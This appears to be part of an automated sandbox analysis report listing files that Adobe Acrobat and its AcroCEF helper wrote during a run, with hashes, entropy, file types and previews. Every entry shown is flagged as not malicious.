                                                                                                                                                Preview:2024/10/28-12:47:26.126 dd8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/28-12:47:26.133 dd8 Recovering log #3.2024/10/28-12:47:26.136 dd8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):331
                                                                                                                                                Entropy (8bit):5.186490738191271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:yBWIt+q2PRN2nKuAl9Ombzo2jMGIFUt8hBWyZmw+hBWttVkwORN2nKuAl9Ombzos:8cvaHAa8uFUt8j3/+jG5JHAa8RJ
                                                                                                                                                MD5:0340817B7A097209254B4F03F5CD9B13
                                                                                                                                                SHA1:82DD9D94C40C962D1C3BB6D2457D1C73FA46A44B
                                                                                                                                                SHA-256:B990CF4DD3B99D3AFBFF6BB95E47A019D76B98E754F2BE9F1C8AB52328AB3636
                                                                                                                                                SHA-512:1E872608881094685E5F77E779AA1333D73DBA41562A1209A1CDAC11C9CC799D9F5CE1E525530864D808FEC358C1E5E69E3811B00C89D7B01626E9387B3F566B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:2024/10/28-12:47:26.126 dd8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/28-12:47:26.133 dd8 Recovering log #3.2024/10/28-12:47:26.136 dd8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):403
                                                                                                                                                Entropy (8bit):4.9849728401179645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:YHO8sqGz2sBdOg2HpOcaq3QYiubrP7E4T3y:YXspbdMHpx3QYhbz7nby
                                                                                                                                                MD5:C1F38B008B3180D1AB4D1EFAED1264FB
                                                                                                                                                SHA1:00F6C8946C310CF3DF47FCEE2A27B4B86C6C1B98
                                                                                                                                                SHA-256:C50BBD55DC4F6C927F7161FBDB68BAEA44AAB8A864B6CF9E197BE087B424F4E3
                                                                                                                                                SHA-512:BD9E88DD916370D52F079860C5B23E7AAEEA126C2AEFAD6C200CEBECEA1730F3DAC4C988F701E74EE8FC30ECBAF030A7BC413A899ED2E3466FD51C4F83616776
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13374694051968959","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":234694},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):403
                                                                                                                                                Entropy (8bit):4.953858338552356
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                                MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                                SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                                SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                                SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):403
                                                                                                                                                Entropy (8bit):4.953858338552356
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                                MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                                SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                                SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                                SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):403
                                                                                                                                                Entropy (8bit):4.953858338552356
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                                MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                                SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                                SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                                SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4099
                                                                                                                                                Entropy (8bit):5.234282396126878
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xeugV6uNX:OLT0bTIeYa51Ogu/0OZARBT8kN88u26M
                                                                                                                                                MD5:FEE0514956C5FB097780FE8F0DEFADCD
                                                                                                                                                SHA1:907BA223E7F8136200169917946550001AC68689
                                                                                                                                                SHA-256:A87BF21233C8436BBD7BB66D7BABC3C33AC60C6C7B371C9D30933EAF7ECA7A1E
                                                                                                                                                SHA-512:2E1A73C39111237C183DFAC3C163FD66C080D704158D45A0BC7BAAC1F5F270A69939BCDAA9C0446468C6D479CFFA927208D721F913B460B250B5B23E54C07FDE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):319
                                                                                                                                                Entropy (8bit):5.206886621288199
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:yBWH3t+q2PRN2nKuAl9OmbzNMxIFUt8hBWhBrXZmw+hBWV3tVkwORN2nKuAl9Omk:8oovaHAa8jFUt8jStX/+jej5JHAa84J
                                                                                                                                                MD5:42029DA7587148C78389BDB04BAC28B7
                                                                                                                                                SHA1:8376D9EA8FE5C4B908E607F7322ADD68C5BC6E6A
                                                                                                                                                SHA-256:160041249282D57313FCEF1C46A6427591B1691E87330469029D66E630F0F487
                                                                                                                                                SHA-512:A958BB908E422A7D52876AC2C5844065C3C8B986DF14F76BEC7F9FA9B9011488D3679E1ACD0A14FAD254830061E9B8BC88B0EF69F733AB0DCA77FDF822E94959
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:2024/10/28-12:47:26.332 dd8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/28-12:47:26.334 dd8 Recovering log #3.2024/10/28-12:47:26.338 dd8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):319
                                                                                                                                                Entropy (8bit):5.206886621288199
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:yBWH3t+q2PRN2nKuAl9OmbzNMxIFUt8hBWhBrXZmw+hBWV3tVkwORN2nKuAl9Omk:8oovaHAa8jFUt8jStX/+jej5JHAa84J
                                                                                                                                                MD5:42029DA7587148C78389BDB04BAC28B7
                                                                                                                                                SHA1:8376D9EA8FE5C4B908E607F7322ADD68C5BC6E6A
                                                                                                                                                SHA-256:160041249282D57313FCEF1C46A6427591B1691E87330469029D66E630F0F487
                                                                                                                                                SHA-512:A958BB908E422A7D52876AC2C5844065C3C8B986DF14F76BEC7F9FA9B9011488D3679E1ACD0A14FAD254830061E9B8BC88B0EF69F733AB0DCA77FDF822E94959
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:2024/10/28-12:47:26.332 dd8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/28-12:47:26.334 dd8 Recovering log #3.2024/10/28-12:47:26.338 dd8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):71190
                                                                                                                                                Entropy (8bit):1.764486060164792
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:B6ObUtlKdQOvTdKu2OJ0Ih56HZhEhFOn+r3dKSAHD:FYlKdXvJOI6HSO+ZaD
                                                                                                                                                MD5:2C4FB6817E21BDAB676FBE854881608C
                                                                                                                                                SHA1:AD9577DB0B43BC928344811BBB8F391F49D128D6
                                                                                                                                                SHA-256:FCAACD92DD554B33A1F8B90A06AD217916F938A231F7416ABE242704363556D3
                                                                                                                                                SHA-512:51413439E837BC71D91006A8349912D08305079ACE7D14DA3B3F30E04B26AA6298B8D13AD61A8683203F2AAB0182619A9C72A714642CA1B5E0CFCEEDD2437D50
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):57344
                                                                                                                                                Entropy (8bit):3.291927920232006
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                                                                                                                MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                                                                                                SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                                                                                                SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                                                                                                SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:SQLite Rollback Journal
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16928
                                                                                                                                                Entropy (8bit):1.211206842636254
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:7+thyqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzm+Z+:7MMqLmFTIF3XmHjBoGGR+jMz+LhUU
                                                                                                                                                MD5:53D744327F3AA5CA3C7AD8BE9CF919D8
                                                                                                                                                SHA1:8E1E27F2DD04F26618150A7FA61C3275CBDCE96C
                                                                                                                                                SHA-256:31E5580B259377916154409F326254931A55B948DE36A14670321AB41075D492
                                                                                                                                                SHA-512:F8715DC0D9850AB6CF114491F41917059A231500753AB941DCD5E760D8FBADC44AE5075DE3A46E734C6F76F30A113BEA1F35A0D33EF607E91812EF41BD416F40
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.... .c.....CTl.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1391
                                                                                                                                                Entropy (8bit):7.705940075877404
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):71954
                                                                                                                                                Entropy (8bit):7.996617769952133
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):192
                                                                                                                                                Entropy (8bit):2.746484906506307
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:kkFklQH5kVltfllXlE/HT8kgz/XNNX8RolJuRdxLlGB9lQRYwpDdt:kKJH5kPeT8zVNMa8RdWBwRd
                                                                                                                                                MD5:5275109F2B337F6823D6E8C3F2FC08A9
                                                                                                                                                SHA1:3643913D66730AB2F3F6E69E39C81E18594A6D0B
                                                                                                                                                SHA-256:7E39CD61FA0F9922AA7C6C62514A4FBDCF853A799B92ADCF87C790B2AAEA2E43
                                                                                                                                                SHA-512:5DBD76DA1387159C50EFC0FFA70E37B9E36BE28B092BED9E0DAC147601247AB0B2E560EA0284E794BADCE0FFF1196DE30675BD4CB4990EE4A4EEA853CE43590B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:p...... ..........:.Y)..(....................................................... ..........W.....^..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):328
                                                                                                                                                Entropy (8bit):3.241800306278291
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:kKhWbPL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:EiDImsLNkPlE99SNxAhUe/3
                                                                                                                                                MD5:4C4D8E48D791ED649A2436134E80AB6C
                                                                                                                                                SHA1:F77A88E5DA014B99EB20866015B22050D08A4FA9
                                                                                                                                                SHA-256:BE91FF32FDD6C648965584763438868C144D197CAD9F46B05A3608404F18C096
                                                                                                                                                SHA-512:CEF191E0791316C80103DCEEE54BFE3AE9F4EC4DF98D5630CA6F3145A9FF84052393F0291CA7DF8CD7C34B410A9797670580E6DF4DB400B3E25A9BBD44036C18
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:p...... .........@.+Y)..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:PostScript document text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185099
                                                                                                                                                Entropy (8bit):5.182478651346149
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                                                                                MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                                                                                SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                                                                                SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                                                                                SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:PostScript document text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185099
                                                                                                                                                Entropy (8bit):5.182478651346149
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                                                                                MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                                                                                SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                                                                                SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                                                                                SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):295
                                                                                                                                                Entropy (8bit):5.371361151855636
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJM3g98kUwPeUkwRe9:YvXKXiu45WRuUhUnAGMbLUkee9
                                                                                                                                                MD5:04D3032B18575164302D52BEF1EA8389
                                                                                                                                                SHA1:1DE288FA8BE9D76133F36C56AEEC08E6943C9026
                                                                                                                                                SHA-256:6D11D5FBAE1581F632E8E5C28792AB2169B7BE1454D055F70AB4134E739EBF69
                                                                                                                                                SHA-512:9581FB37D2C66B4A4E035C8B56917148C31982AAD1ED4E72C12D7F672611B122F8810E397D3A8B9B128C42EC9E568CB171A907545B7E9B1F5FE8A493C5DAA2AD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):294
                                                                                                                                                Entropy (8bit):5.321768698100945
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJfBoTfXpnrPeUkwRe9:YvXKXiu45WRuUhUnAGWTfXcUkee9
                                                                                                                                                MD5:63432186FE0441423605CA9B42625B84
                                                                                                                                                SHA1:90DE73B3E940AC12315A283003F1C335DAB082DE
                                                                                                                                                SHA-256:8A340269D680A5BF037EE5B0F0EA8420FE6CEDB96621633307BD826A1FE17992
